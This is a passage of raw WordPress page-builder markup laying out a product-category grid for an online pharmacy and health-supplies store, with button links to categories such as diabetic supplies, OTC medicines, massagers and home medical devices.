href=\"https:\/\/avanmedibazar.com\/product-category\/health-care\/baby-care\/\" title=\"https:\/\/avanmedibazar.com\/product-category\/health-care\/baby-care\/\" target=\"_blank\" class=\"btn btn-scheme-light btn-scheme-hover-light btn-style-default btn-shape-rectangle btn-size-default btn-full-width\">Infant Care<\/a><\/div>[vc_single_image image=”4833″ img_size=”medium” alignment=”center” style=”vc_box_border” border_color=”sky” onclick=”custom_link” img_link_target=”_blank” parallax_scroll=”no” link=”https:\/\/avanmedibazar.com\/product-category\/health-care\/baby-care\/”][\/vc_column_inner][vc_column_inner width=”1\/4″ offset=”vc_col-xs-6″]<div id=\"wd-60ccdf986063f\" class=\"woodmart-button-wrapper text-center\"><a href=\"https:\/\/avanmedibazar.com\/product-category\/health-care\/mother-care\/\" title=\"https:\/\/avanmedibazar.com\/product-category\/health-care\/mother-care\/\" target=\"_blank\" class=\"btn btn-scheme-light btn-scheme-hover-light btn-style-default btn-shape-rectangle btn-size-default btn-full-width\">Mother Care<\/a><\/div>[vc_single_image image=”4835″ img_size=”medium” alignment=”center” style=”vc_box_border” border_color=”sky” onclick=”custom_link” img_link_target=”_blank” parallax_scroll=”no” link=”https:\/\/avanmedibazar.com\/product-category\/health-care\/mother-care\/”][\/vc_column_inner][vc_column_inner width=”1\/4″ offset=”vc_col-xs-6″]<div id=\"wd-6100f982d8dd8\" class=\"woodmart-button-wrapper text-center\"><a href=\"https:\/\/avanmedibazar.com\/product-category\/diet-nutition\/\" title=\"https:\/\/avanmedibazar.com\/product-category\/diet-nutition\/\" target=\"_blank\" class=\"btn btn-scheme-light btn-scheme-hover-light btn-style-default btn-shape-rectangle btn-size-default btn-full-width\">Diet & Nutrition Care<\/a><\/div>[vc_single_image image=”5046″ img_size=”medium” alignment=”center” style=”vc_box_border” border_color=”sky” onclick=”custom_link” img_link_target=”_blank” parallax_scroll=”no” link=”https:\/\/avanmedibazar.com\/product-category\/diet-nutition\/”][\/vc_column_inner][vc_column_inner width=”1\/4″ offset=”vc_col-xs-6″]<div id=\"wd-610138752ec45\" class=\"woodmart-button-wrapper text-center\"><a href=\"https:\/\/avanmedibazar.com\/product-category\/skin-care\/\" title=\"https:\/\/avanmedibazar.com\/product-category\/skin-care\/\" target=\"_blank\" class=\"btn btn-scheme-light btn-scheme-hover-light btn-style-default btn-shape-rectangle btn-size-default btn-full-width\">Skin Care<\/a><\/div>[vc_single_image image=”5275″ img_size=”medium” alignment=”center” style=”vc_box_border” border_color=”sky” onclick=”custom_link” img_link_target=”_blank” parallax_scroll=”no” link=”https:\/\/avanmedibazar.com\/product-category\/skin-care\/”][\/vc_column_inner][\/vc_row_inner][vc_row_inner][vc_column_inner width=”1\/4″ offset=”vc_col-xs-6″]<div id=\"wd-6101422d26516\" class=\"woodmart-button-wrapper text-center\"><a href=\"https:\/\/avanmedibazar.com\/product-category\/health-care\/personal-care\/\" title=\"https:\/\/avanmedibazar.com\/product-category\/health-care\/personal-care\/\" target=\"_blank\" class=\"btn btn-scheme-light btn-scheme-hover-light btn-style-default btn-shape-rectangle btn-size-default btn-full-width\">Personal Care<\/a><\/div>[vc_single_image image=”5323″ img_size=”medium” alignment=”center” style=”vc_box_border” border_color=”sky” onclick=”custom_link” img_link_target=”_blank” parallax_scroll=”no” link=”https:\/\/avanmedibazar.com\/product-category\/health-care\/personal-care\/”][\/vc_column_inner][vc_column_inner width=”1\/4″ offset=”vc_col-xs-6″]<div id=\"wd-61013b09087ad\" class=\"woodmart-button-wrapper text-center\"><a href=\"https:\/\/avanmedibazar.com\/product-category\/health-care\/beauty-care\/\" title=\"https:\/\/avanmedibazar.com\/product-category\/health-care\/beauty-care\/\" target=\"_blank\" class=\"btn btn-scheme-light btn-scheme-hover-light btn-style-default btn-shape-rectangle btn-size-default btn-full-width\">Face Care<\/a><\/div>[vc_single_image image=”4843″ img_size=”medium” alignment=”center” style=”vc_box_border” border_color=”sky” onclick=”custom_link” img_link_target=”_blank” parallax_scroll=”no” link=”https:\/\/avanmedibazar.com\/product-category\/health-care\/beauty-care\/”][\/vc_column_inner][vc_column_inner width=”1\/4″ offset=”vc_col-xs-6″]<div id=\"wd-6101450542a93\" class=\"woodmart-button-wrapper text-center\"><a href=\"https:\/\/avanmedibazar.com\/product-category\/health-care\/beauty-care\/\" title=\"https:\/\/avanmedibazar.com\/product-category\/health-care\/beauty-care\/\" target=\"_blank\" class=\"btn btn-scheme-light btn-scheme-hover-light btn-style-default btn-shape-rectangle btn-size-default btn-full-width\">Hair Care<\/a><\/div>[vc_single_image image=”5272″ img_size=”medium” alignment=”center” style=”vc_box_border” border_color=”sky” onclick=”custom_link” img_link_target=”_blank” parallax_scroll=”no” link=”https:\/\/avanmedibazar.com\/product\/beurer-precision-hair-removal-laser-las-50\/”][\/vc_column_inner][vc_column_inner width=”1\/4″ offset=”vc_col-xs-6″]<div id=\"wd-60f2fa6e2bfbf\" class=\"woodmart-button-wrapper text-center\"><a href=\"https:\/\/avanmedibazar.com\/product-category\/health-care\/adult-care\/\" title=\"https:\/\/avanmedibazar.com\/product-category\/health-care\/adult-care\/\" target=\"_blank\" class=\"btn btn-scheme-light btn-scheme-hover-light btn-style-default btn-shape-rectangle btn-size-default btn-full-width\">Cosmetic Beauty Care<\/a><\/div>[vc_single_image image=”5273″ img_size=”medium” alignment=”center” style=”vc_box_border” border_color=”sky” onclick=”custom_link” img_link_target=”_blank” parallax_scroll=”no” link=”https:\/\/avanmedibazar.com\/product-category\/diet-nutition\/”][\/vc_column_inner][\/vc_row_inner][vc_row_inner][vc_column_inner width=”1\/4″ offset=”vc_col-xs-6″]<div id=\"wd-60f2faa53ebad\" class=\"woodmart-button-wrapper text-center\"><a href=\"https:\/\/avanmedibazar.com\/product-category\/health-care\/baby-care\/\" title=\"https:\/\/avanmedibazar.com\/product-category\/health-care\/baby-care\/\" target=\"_blank\" class=\"btn btn-scheme-light btn-scheme-hover-light btn-style-default btn-shape-rectangle btn-size-default btn-full-width\">Organic Food<\/a><\/div>[vc_single_image image=”5276″ img_size=”medium” alignment=”center” style=”vc_box_border” border_color=”sky” onclick=”custom_link” img_link_target=”_blank” parallax_scroll=”no” link=”https:\/\/avanmedibazar.com\/product-category\/diet-nutition\/”][\/vc_column_inner][vc_column_inner width=”1\/4″ offset=”vc_col-xs-6″]<div id=\"wd-6100f09661aab\" class=\"woodmart-button-wrapper text-center\"><a href=\"https:\/\/avanmedibazar.com\/product-category\/day-care\/\" title=\"https:\/\/avanmedibazar.com\/product-category\/day-care\/\" target=\"_blank\" class=\"btn btn-scheme-light btn-scheme-hover-light btn-style-default btn-shape-rectangle btn-size-default btn-full-width\">Oral & Dental Care<\/a><\/div>[vc_single_image image=”5297″ img_size=”medium” alignment=”center” style=”vc_box_border” border_color=”sky” onclick=”custom_link” img_link_target=”_blank” parallax_scroll=”no” link=”https:\/\/avanmedibazar.com\/product-category\/health-care\/dental-care\/”][\/vc_column_inner][vc_column_inner width=”1\/4″ offset=”vc_col-xs-6″]<div id=\"wd-610132cd6909c\" class=\"woodmart-button-wrapper text-center\"><a href=\"https:\/\/avanmedibazar.com\/product-category\/daily-needs\/\" title=\"https:\/\/avanmedibazar.com\/product-category\/daily-needs\/\" target=\"_blank\" class=\"btn btn-scheme-light btn-scheme-hover-light btn-style-default btn-shape-rectangle btn-size-default btn-full-width\">Daily Needs<\/a><\/div>[vc_single_image image=”5313″ img_size=”medium” alignment=”center” style=”vc_box_border” border_color=”sky” onclick=”custom_link” img_link_target=”_blank” parallax_scroll=”no” link=”https:\/\/avanmedibazar.com\/product-category\/daily-needs\/”][\/vc_column_inner][vc_column_inner width=”1\/4″ offset=”vc_col-xs-6″]<div id=\"wd-6100f6b6deab9\" class=\"woodmart-button-wrapper text-center\"><a href=\"https:\/\/avanmedibazar.com\/product-category\/health-care\/beaury-care\/\" title=\"https:\/\/avanmedibazar.com\/product-category\/health-care\/beaury-care\/\" target=\"_blank\" class=\"btn btn-scheme-light btn-scheme-hover-light btn-style-default btn-shape-rectangle btn-size-default btn-full-width\">Fitness & Exercise<\/a><\/div>[vc_single_image image=”5294″ img_size=”medium” alignment=”center” style=”vc_box_border” border_color=”sky” onclick=”custom_link” img_link_target=”_blank” parallax_scroll=”no” link=”https:\/\/avanmedibazar.com\/product-category\/sports-body-building\/”][\/vc_column_inner][\/vc_row_inner][vc_row_inner][vc_column_inner][vc_empty_space woodmart_hide_large=”0″ woodmart_hide_medium=”0″ woodmart_hide_small=”0″ woodmart_hide_extra_small=”0″][\/vc_column_inner][\/vc_row_inner][vc_row_inner][vc_column_inner][vc_btn title=”Diabetic Store” style=”3d” color=”primary” size=”lg” align=”center” button_block=”true” css=”.vc_custom_1623303121639{border-radius: 5px !important;}”][\/vc_column_inner][\/vc_row_inner][vc_row_inner][vc_column_inner width=”1\/4″ offset=”vc_col-xs-6″]<div id=\"wd-60bfb1bad4c7c\" class=\"woodmart-button-wrapper text-center\"><a href=\"https:\/\/avanmedibazar.com\/product-category\/glucose-meter-and-stripes\/\" title=\"https:\/\/avanmedibazar.com\/product-category\/glucose-meter-and-stripes\/\" class=\"btn btn-scheme-light btn-scheme-hover-light btn-style-default btn-shape-rectangle btn-size-default btn-full-width\">Accu-Chek Active (50 Strips)<\/a><\/div>[vc_single_image image=”4195″ img_size=”medium” alignment=”center” style=”vc_box_border” border_color=”sky” onclick=”custom_link” img_link_target=”_blank” parallax_scroll=”no” link=”https:\/\/avanmedibazar.com\/product-category\/diabetic-store\/”][\/vc_column_inner][vc_column_inner width=”1\/4″ offset=”vc_col-xs-6″]<div id=\"wd-60c6f8992e942\" class=\"woodmart-button-wrapper text-center\"><a href=\"https:\/\/avanmedibazar.com\/product-category\/diabetic-store\/\" title=\"https:\/\/avanmedibazar.com\/product-category\/diabetic-store\/\" target=\"_blank\" class=\"btn btn-scheme-light btn-scheme-hover-light btn-style-default btn-shape-rectangle btn-size-default btn-full-width\">Accu-Chek\u00ae Softclix<\/a><\/div>[vc_single_image image=”4200″ img_size=”full” alignment=”center” style=”vc_box_border” border_color=”sky” onclick=”custom_link” img_link_target=”_blank” parallax_scroll=”no” link=”https:\/\/avanmedibazar.com\/product-category\/diabetic-store\/”][\/vc_column_inner][vc_column_inner width=”1\/4″ offset=”vc_col-xs-6″]<div id=\"wd-60c6f8f2209c4\" class=\"woodmart-button-wrapper text-center\"><a href=\"https:\/\/avanmedibazar.com\/product-category\/diabetic-store\/\" title=\"https:\/\/avanmedibazar.com\/product-category\/diabetic-store\/\" target=\"_blank\" class=\"btn btn-scheme-light btn-scheme-hover-light btn-style-default btn-shape-rectangle btn-size-default btn-full-width\">Glucose Meter<\/a><\/div>[vc_single_image image=”4041″ img_size=”medium” alignment=”center” style=”vc_box_border” border_color=”sky” onclick=”custom_link” img_link_target=”_blank” parallax_scroll=”no” link=”https:\/\/avanmedibazar.com\/product-category\/diabetic-store\/”][\/vc_column_inner][vc_column_inner width=”1\/4″ offset=”vc_col-xs-6″]<div id=\"wd-60c6f90f7fd03\" class=\"woodmart-button-wrapper text-center\"><a href=\"https:\/\/avanmedibazar.com\/product-category\/diabetic-store\/\" title=\"https:\/\/avanmedibazar.com\/product-category\/diabetic-store\/\" target=\"_blank\" class=\"btn btn-scheme-light btn-scheme-hover-light btn-style-default btn-shape-rectangle btn-size-default btn-full-width\">NovoPen<\/a><\/div>[vc_single_image image=”4203″ img_size=”medium” alignment=”center” style=”vc_box_border” border_color=”sky” onclick=”custom_link” img_link_target=”_blank” parallax_scroll=”no” link=”https:\/\/avanmedibazar.com\/product-category\/diabetic-store\/”][\/vc_column_inner][\/vc_row_inner][vc_row_inner][vc_column_inner width=”1\/4″ offset=”vc_col-xs-6″]<div id=\"wd-60c6fa3e21b6c\" class=\"woodmart-button-wrapper text-center\"><a href=\"https:\/\/avanmedibazar.com\/product-category\/diabetic-store\/\" title=\"https:\/\/avanmedibazar.com\/product-category\/diabetic-store\/\" target=\"_blank\" class=\"btn btn-scheme-light btn-scheme-hover-light btn-style-default btn-shape-rectangle btn-size-default btn-full-width\">GLUCERNA SR DIABETES MILK<\/a><\/div>[vc_single_image image=”4211″ img_size=”medium” alignment=”center” style=”vc_box_border” border_color=”sky” onclick=”custom_link” img_link_target=”_blank” parallax_scroll=”no” link=”https:\/\/avanmedibazar.com\/product-category\/diabetic-store\/”][\/vc_column_inner][vc_column_inner width=”1\/4″ offset=”vc_col-xs-6″]<div id=\"wd-60c6f94a4ff3c\" class=\"woodmart-button-wrapper text-center\"><a href=\"https:\/\/avanmedibazar.com\/product-category\/diabetic-store\/\" title=\"https:\/\/avanmedibazar.com\/product-category\/diabetic-store\/\" target=\"_blank\" class=\"btn btn-scheme-light btn-scheme-hover-light btn-style-default btn-shape-rectangle btn-size-default btn-full-width\">Abbott Ensure Milk<\/a><\/div>[vc_single_image image=”4216″ img_size=”full” alignment=”center” style=”vc_box_border” border_color=”sky” onclick=”custom_link” img_link_target=”_blank” parallax_scroll=”no” link=”https:\/\/avanmedibazar.com\/product-category\/diabetic-store\/”][\/vc_column_inner][vc_column_inner width=”1\/4″ offset=”vc_col-xs-6″]<div id=\"wd-60c6f98e92b61\" class=\"woodmart-button-wrapper text-center\"><a href=\"https:\/\/avanmedibazar.com\/product-category\/diabetic-store\/\" title=\"https:\/\/avanmedibazar.com\/product-category\/diabetic-store\/\" target=\"_blank\" class=\"btn btn-scheme-light btn-scheme-hover-light btn-style-default btn-shape-rectangle btn-size-default btn-full-width\">Purnava Low G.I Rice<\/a><\/div>[vc_single_image image=”4219″ img_size=”medium” alignment=”center” style=”vc_box_border” border_color=”sky” onclick=”custom_link” img_link_target=”_blank” parallax_scroll=”no” link=”https:\/\/avanmedibazar.com\/product-category\/diabetic-store\/”][\/vc_column_inner][vc_column_inner width=”1\/4″ offset=”vc_col-xs-6″]<div id=\"wd-60c6f9a56cccc\" class=\"woodmart-button-wrapper text-center\"><a href=\"https:\/\/avanmedibazar.com\/product-category\/diabetic-store\/\" title=\"https:\/\/avanmedibazar.com\/product-category\/diabetic-store\/\" target=\"_blank\" class=\"btn btn-scheme-light btn-scheme-hover-light btn-style-default btn-shape-rectangle btn-size-default btn-full-width\">Diabetic Foot Cream<\/a><\/div>[vc_single_image image=”4222″ img_size=”medium” alignment=”center” style=”vc_box_border” border_color=”sky” onclick=”custom_link” img_link_target=”_blank” parallax_scroll=”no” link=”https:\/\/avanmedibazar.com\/product-category\/diabetic-store\/”][\/vc_column_inner][\/vc_row_inner][vc_row_inner][vc_column_inner][vc_empty_space woodmart_hide_large=”0″ woodmart_hide_medium=”0″ woodmart_hide_small=”0″ woodmart_hide_extra_small=”0″][\/vc_column_inner][\/vc_row_inner][vc_row_inner][vc_column_inner][vc_btn title=”Pharmacy \/ Medicine \/ Drug Store” style=”3d” color=”primary” size=”lg” align=”center” button_block=”true” css=”.vc_custom_1625814253348{border-radius: 4px !important;}”][\/vc_column_inner][\/vc_row_inner][vc_row_inner][vc_column_inner width=”1\/4″ offset=”vc_col-xs-6″]<div id=\"wd-60e7f55a6ca93\" class=\"woodmart-button-wrapper text-center\"><a href=\"https:\/\/avanmedibazar.com\/product-category\/mens-care\/\" title=\"https:\/\/avanmedibazar.com\/product-category\/mens-care\/\" target=\"_blank\" class=\"btn btn-scheme-light btn-scheme-hover-light btn-style-default btn-shape-rectangle btn-size-default btn-full-width\">OTC Medicnes<\/a><\/div>[vc_single_image image=”5076″ img_size=”medium” alignment=”center” style=”vc_box_border” border_color=”sky” onclick=”custom_link” img_link_target=”_blank” parallax_scroll=”no” link=”https:\/\/avanmedibazar.com\/product-category\/sports-body-building\/”][\/vc_column_inner][vc_column_inner width=”1\/4″ offset=”vc_col-xs-6″]<div id=\"wd-60e7f57045105\" class=\"woodmart-button-wrapper text-center\"><a href=\"https:\/\/avanmedibazar.com\/product-category\/day-care\/\" title=\"https:\/\/avanmedibazar.com\/product-category\/day-care\/\" target=\"_blank\" class=\"btn btn-scheme-light btn-scheme-hover-light btn-style-default btn-shape-rectangle btn-size-default btn-full-width\">Birth Control<\/a><\/div>[vc_single_image image=”5077″ img_size=”medium” alignment=”center” style=”vc_box_border” border_color=”sky” onclick=”custom_link” img_link_target=”_blank” parallax_scroll=”no” link=”https:\/\/avanmedibazar.com\/product-category\/health-care\/personal-care\/”][\/vc_column_inner][vc_column_inner width=”1\/4″ offset=”vc_col-xs-6″]<div id=\"wd-60e7f599746ec\" class=\"woodmart-button-wrapper text-center\"><a href=\"https:\/\/avanmedibazar.com\/product-category\/health-care\/beaury-care\/\" title=\"https:\/\/avanmedibazar.com\/product-category\/health-care\/beaury-care\/\" target=\"_blank\" class=\"btn btn-scheme-light btn-scheme-hover-light btn-style-default btn-shape-rectangle btn-size-default btn-full-width\">Vitamins and Supplements<\/a><\/div>[vc_single_image image=”5083″ img_size=”medium” alignment=”center” style=”vc_box_border” border_color=”sky” onclick=”custom_link” img_link_target=”_blank” parallax_scroll=”no” link=”https:\/\/avanmedibazar.com\/product-category\/diet-nutition\/”][\/vc_column_inner][vc_column_inner width=”1\/4″ offset=”vc_col-xs-6″]<div id=\"wd-60e7f5b865c3e\" class=\"woodmart-button-wrapper text-center\"><a href=\"https:\/\/avanmedibazar.com\/product-category\/health-care\/adult-care\/\" title=\"https:\/\/avanmedibazar.com\/product-category\/health-care\/adult-care\/\" target=\"_blank\" class=\"btn btn-scheme-light btn-scheme-hover-light btn-style-default btn-shape-rectangle btn-size-default btn-full-width\">Skin Care<\/a><\/div>[vc_single_image image=”5082″ img_size=”medium” alignment=”center” style=”vc_box_border” border_color=”sky” onclick=”custom_link” img_link_target=”_blank” parallax_scroll=”no” link=”https:\/\/avanmedibazar.com\/product-category\/diet-nutition\/”][\/vc_column_inner][\/vc_row_inner][vc_row_inner][vc_column_inner width=”1\/4″ offset=”vc_col-xs-6″]<div id=\"wd-60e7f5e9a508a\" class=\"woodmart-button-wrapper text-center\"><a href=\"https:\/\/avanmedibazar.com\/product-category\/mens-care\/\" title=\"https:\/\/avanmedibazar.com\/product-category\/mens-care\/\" target=\"_blank\" class=\"btn btn-scheme-light btn-scheme-hover-light btn-style-default btn-shape-rectangle btn-size-default btn-full-width\">Diabetic<\/a><\/div>[vc_single_image image=”4203″ img_size=”medium” alignment=”center” style=”vc_box_border” border_color=”sky” onclick=”custom_link” img_link_target=”_blank” parallax_scroll=”no” link=”https:\/\/avanmedibazar.com\/product-category\/sports-body-building\/”][\/vc_column_inner][vc_column_inner width=”1\/4″ offset=”vc_col-xs-6″]<div id=\"wd-60e7fc8ce1462\" class=\"woodmart-button-wrapper text-center\"><a href=\"https:\/\/avanmedibazar.com\/product-category\/day-care\/\" title=\"https:\/\/avanmedibazar.com\/product-category\/day-care\/\" target=\"_blank\" class=\"btn btn-scheme-light btn-scheme-hover-light btn-style-default btn-shape-rectangle btn-size-default btn-full-width\">Diaper \/ Sanitary Pad<\/a><\/div>[vc_single_image image=”5078″ img_size=”medium” alignment=”center” style=”vc_box_border” border_color=”sky” onclick=”custom_link” img_link_target=”_blank” parallax_scroll=”no” link=”https:\/\/avanmedibazar.com\/product-category\/health-care\/personal-care\/”][\/vc_column_inner][vc_column_inner width=”1\/4″ offset=”vc_col-xs-6″]<div id=\"wd-60e7fcd3849ac\" class=\"woodmart-button-wrapper text-center\"><a href=\"https:\/\/avanmedibazar.com\/product-category\/health-care\/beaury-care\/\" title=\"https:\/\/avanmedibazar.com\/product-category\/health-care\/beaury-care\/\" target=\"_blank\" class=\"btn btn-scheme-light btn-scheme-hover-light btn-style-default btn-shape-rectangle btn-size-default btn-full-width\">Personal Pleasure<\/a><\/div>[vc_single_image image=”5079″ img_size=”medium” alignment=”center” style=”vc_box_border” border_color=”sky” onclick=”custom_link” img_link_target=”_blank” parallax_scroll=”no” link=”https:\/\/avanmedibazar.com\/product-category\/diet-nutition\/”][\/vc_column_inner][vc_column_inner width=”1\/4″ offset=”vc_col-xs-6″]<div id=\"wd-60e863a1af685\" class=\"woodmart-button-wrapper text-center\"><a href=\"https:\/\/avanmedibazar.com\/product-category\/health-care\/adult-care\/\" title=\"https:\/\/avanmedibazar.com\/product-category\/health-care\/adult-care\/\" target=\"_blank\" class=\"btn btn-scheme-light btn-scheme-hover-light btn-style-default btn-shape-rectangle btn-size-default btn-full-width\">First Aid and Safety<\/a><\/div>[vc_single_image image=”4822″ img_size=”medium” alignment=”center” style=”vc_box_border” border_color=”sky” onclick=”custom_link” img_link_target=”_blank” parallax_scroll=”no” link=”https:\/\/avanmedibazar.com\/product-category\/diet-nutition\/”][\/vc_column_inner][\/vc_row_inner][vc_row_inner][vc_column_inner][vc_empty_space woodmart_hide_large=”0″ woodmart_hide_medium=”0″ woodmart_hide_small=”0″ woodmart_hide_extra_small=”0″][\/vc_column_inner][\/vc_row_inner][vc_row_inner][vc_column_inner][vc_btn title=”Home Medical Supplies\/Households” style=”3d” color=”primary” size=”lg” align=”center” button_block=”true” css=”.vc_custom_1623303165168{border-radius: 5px !important;}”][\/vc_column_inner][\/vc_row_inner][vc_row_inner][vc_column_inner width=”1\/4″ offset=”vc_col-xs-6″]<div id=\"wd-60cb2a8d87e67\" class=\"woodmart-button-wrapper text-center\"><a href=\"https:\/\/avanmedibazar.com\/product-category\/air-mattress\/\" title=\"https:\/\/avanmedibazar.com\/product-category\/air-mattress\/\" target=\"_blank\" class=\"btn btn-scheme-light btn-scheme-hover-light btn-style-default btn-shape-rectangle btn-size-default btn-full-width\">Air Mattress<\/a><\/div>[vc_single_image image=”4793″ img_size=”medium” alignment=”center” style=”vc_box_border” border_color=”sky” onclick=”custom_link” img_link_target=”_blank” parallax_scroll=”no” link=”https:\/\/avanmedibazar.com\/product-category\/air-mattress\/”][\/vc_column_inner][vc_column_inner width=”1\/4″ offset=”vc_col-xs-6″]<div id=\"wd-60cb2bea13a6c\" class=\"woodmart-button-wrapper text-center\"><a href=\"https:\/\/avanmedibazar.com\/product-category\/air-purifier\/\" title=\"https:\/\/avanmedibazar.com\/product-category\/air-purifier\/\" target=\"_blank\" class=\"btn btn-scheme-light btn-scheme-hover-light btn-style-default btn-shape-rectangle btn-size-default btn-full-width\">Air Purifier<\/a><\/div>[vc_single_image image=”4796″ img_size=”medium” alignment=”center” style=”vc_box_border” border_color=”sky” onclick=”custom_link” img_link_target=”_blank” parallax_scroll=”no” link=”https:\/\/avanmedibazar.com\/product-category\/air-purifier\/”][\/vc_column_inner][vc_column_inner width=”1\/4″ offset=”vc_col-xs-6″]<div id=\"wd-60ed984303970\" class=\"woodmart-button-wrapper text-center\"><a href=\"https:\/\/avanmedibazar.com\/product-category\/massager\/\" title=\"https:\/\/avanmedibazar.com\/product-category\/massager\/\" target=\"_blank\" class=\"btn btn-scheme-light btn-scheme-hover-light btn-style-default btn-shape-rectangle btn-size-default btn-full-width\">Air Humidifier (Mini)<\/a><\/div>[vc_single_image image=”3369″ img_size=”medium” alignment=”center” style=”vc_box_border” border_color=”sky” onclick=”custom_link” img_link_target=”_blank” parallax_scroll=”no” link=”https:\/\/avanmedibazar.com\/product-category\/air-purifier\/”][\/vc_column_inner][vc_column_inner width=”1\/4″ offset=”vc_col-xs-6″]<div id=\"wd-60ed9b0e05215\" class=\"woodmart-button-wrapper text-center\"><a href=\"https:\/\/avanmedibazar.com\/product-category\/health-and-beauty\/\" title=\"https:\/\/avanmedibazar.com\/product-category\/health-and-beauty\/\" target=\"_blank\" class=\"btn btn-scheme-light btn-scheme-hover-light btn-style-default btn-shape-rectangle btn-size-default btn-full-width\">Bluetooth Activity Monitor<\/a><\/div>[vc_single_image image=”5193″ img_size=”medium” alignment=”center” style=”vc_box_border” border_color=”sky” onclick=”custom_link” img_link_target=”_blank” parallax_scroll=”no” link=”https:\/\/avanmedibazar.com\/product-category\/activity-monitorbluetooth-sensor\/”][\/vc_column_inner][\/vc_row_inner][vc_row_inner][vc_column_inner width=”1\/4″ offset=”vc_col-xs-6″]<div id=\"wd-60ee77005ec33\" class=\"woodmart-button-wrapper text-center\"><a href=\"https:\/\/avanmedibazar.com\/product-category\/health-care\/adult-care\/\" title=\"https:\/\/avanmedibazar.com\/product-category\/health-care\/adult-care\/\" target=\"_blank\" class=\"btn btn-scheme-light btn-scheme-hover-light btn-style-default btn-shape-rectangle btn-size-default btn-full-width\">Foot Massage Care<\/a><\/div>[vc_single_image image=”4858″ img_size=”medium” alignment=”center” style=”vc_box_border” border_color=”sky” onclick=”custom_link” img_link_target=”_blank” parallax_scroll=”no” link=”https:\/\/avanmedibazar.com\/product-category\/massager\/”][\/vc_column_inner][vc_column_inner width=”1\/4″ offset=”vc_col-xs-6″]<div id=\"wd-60ee7853b1a4f\" class=\"woodmart-button-wrapper text-center\"><a href=\"https:\/\/avanmedibazar.com\/product-category\/air-purifier\/\" title=\"https:\/\/avanmedibazar.com\/product-category\/air-purifier\/\" target=\"_blank\" class=\"btn btn-scheme-light btn-scheme-hover-light btn-style-default btn-shape-rectangle btn-size-default btn-full-width\">Heating Belt<\/a><\/div>[vc_single_image image=”5155″ img_size=”medium” alignment=”center” style=”vc_box_border” border_color=”sky” onclick=”custom_link” img_link_target=”_blank” link=”https:\/\/avanmedibazar.com\/product-category\/massager\/” parallax_scroll=”no”][\/vc_column_inner][vc_column_inner width=”1\/4″ offset=”vc_col-xs-6″]<div id=\"wd-60ee7b3df02d6\" class=\"woodmart-button-wrapper text-center\"><a href=\"https:\/\/avanmedibazar.com\/product-category\/massager\/\" title=\"https:\/\/avanmedibazar.com\/product-category\/massager\/\" target=\"_blank\" class=\"btn btn-scheme-light btn-scheme-hover-light btn-style-default btn-shape-rectangle btn-size-default btn-full-width\">Massage Belt<\/a><\/div>[vc_single_image image=”4846″ img_size=”medium” alignment=”center” style=”vc_box_border” border_color=”sky” onclick=”custom_link” img_link_target=”_blank” parallax_scroll=”no” link=”https:\/\/avanmedibazar.com\/product-category\/massager\/”][\/vc_column_inner][vc_column_inner width=”1\/4″ offset=”vc_col-xs-6″]<div id=\"wd-60ee7762903a7\" class=\"woodmart-button-wrapper text-center\"><a href=\"https:\/\/avanmedibazar.com\/product-category\/massager\/\" title=\"https:\/\/avanmedibazar.com\/product-category\/massager\/\" target=\"_blank\" class=\"btn btn-scheme-light btn-scheme-hover-light btn-style-default btn-shape-rectangle btn-size-default btn-full-width\">Deluxe Massage Chair<\/a><\/div>[vc_single_image image=”4804″ img_size=”medium” alignment=”center” style=”vc_box_border” border_color=”sky” onclick=”custom_link” img_link_target=”_blank” parallax_scroll=”no” link=”https:\/\/avanmedibazar.com\/product-category\/massager\/”][\/vc_column_inner][\/vc_row_inner][vc_row_inner][vc_column_inner width=”1\/4″ offset=”vc_col-xs-6″]<div id=\"wd-60ee7b809c9f1\" class=\"woodmart-button-wrapper text-center\"><a href=\"https:\/\/avanmedibazar.com\/product-category\/health-care\/adult-care\/\" title=\"https:\/\/avanmedibazar.com\/product-category\/health-care\/adult-care\/\" target=\"_blank\" class=\"btn btn-scheme-light btn-scheme-hover-light btn-style-default btn-shape-rectangle btn-size-default btn-full-width\">Nebulizer<\/a><\/div>[vc_single_image image=”5220″ img_size=”medium” alignment=”center” style=”vc_box_border” border_color=”sky” onclick=”custom_link” img_link_target=”_blank” parallax_scroll=”no” link=”https:\/\/avanmedibazar.com\/product-category\/nebulizaer\/”][\/vc_column_inner][vc_column_inner width=”1\/4″ offset=”vc_col-xs-6″]<div id=\"wd-60ee7ba412f15\" class=\"woodmart-button-wrapper text-center\"><a href=\"https:\/\/avanmedibazar.com\/product-category\/air-purifier\/\" title=\"https:\/\/avanmedibazar.com\/product-category\/air-purifier\/\" target=\"_blank\" class=\"btn btn-scheme-light btn-scheme-hover-light btn-style-default btn-shape-rectangle btn-size-default btn-full-width\">GLUCOSE METER<\/a><\/div>[vc_single_image image=”5234″ img_size=”medium” alignment=”center” style=”vc_box_border” border_color=”sky” onclick=”custom_link” img_link_target=”_blank” parallax_scroll=”no” link=”https:\/\/avanmedibazar.com\/product-category\/glucose-meter-and-stripes\/”][\/vc_column_inner][vc_column_inner width=”1\/4″ offset=”vc_col-xs-6″]<div id=\"wd-60ee7bcf15e16\" class=\"woodmart-button-wrapper text-center\"><a href=\"https:\/\/avanmedibazar.com\/product-category\/massager\/\" title=\"https:\/\/avanmedibazar.com\/product-category\/massager\/\" target=\"_blank\" class=\"btn btn-scheme-light btn-scheme-hover-light btn-style-default btn-shape-rectangle btn-size-default btn-full-width\">BP Machine<\/a><\/div>[vc_single_image image=”5289″ img_size=”medium” alignment=”center” style=”vc_box_border” border_color=”sky” onclick=”custom_link” img_link_target=”_blank” parallax_scroll=”no” link=”https:\/\/avanmedibazar.com\/product-category\/bp-machine-blood-pressure-machine\/”][\/vc_column_inner][vc_column_inner width=”1\/4″ offset=”vc_col-xs-6″]<div id=\"wd-60ee7bed524b1\" class=\"woodmart-button-wrapper text-center\"><a href=\"https:\/\/avanmedibazar.com\/product-category\/massager\/\" title=\"https:\/\/avanmedibazar.com\/product-category\/massager\/\" target=\"_blank\" class=\"btn btn-scheme-light btn-scheme-hover-light btn-style-default btn-shape-rectangle btn-size-default btn-full-width\">Pulse Oximeter<\/a><\/div>[vc_single_image image=”2974″ img_size=”full” alignment=”center” style=”vc_box_border” border_color=”sky” onclick=”custom_link” img_link_target=”_blank” parallax_scroll=”no” link=”https:\/\/avanmedibazar.com\/product-category\/pulse-oximeter\/”][\/vc_column_inner][\/vc_row_inner][vc_row_inner][vc_column_inner][vc_empty_space woodmart_hide_large=”0″ woodmart_hide_medium=”0″ woodmart_hide_small=”0″ woodmart_hide_extra_small=”0″][\/vc_column_inner][\/vc_row_inner][vc_row_inner][vc_column_inner][vc_images_carousel 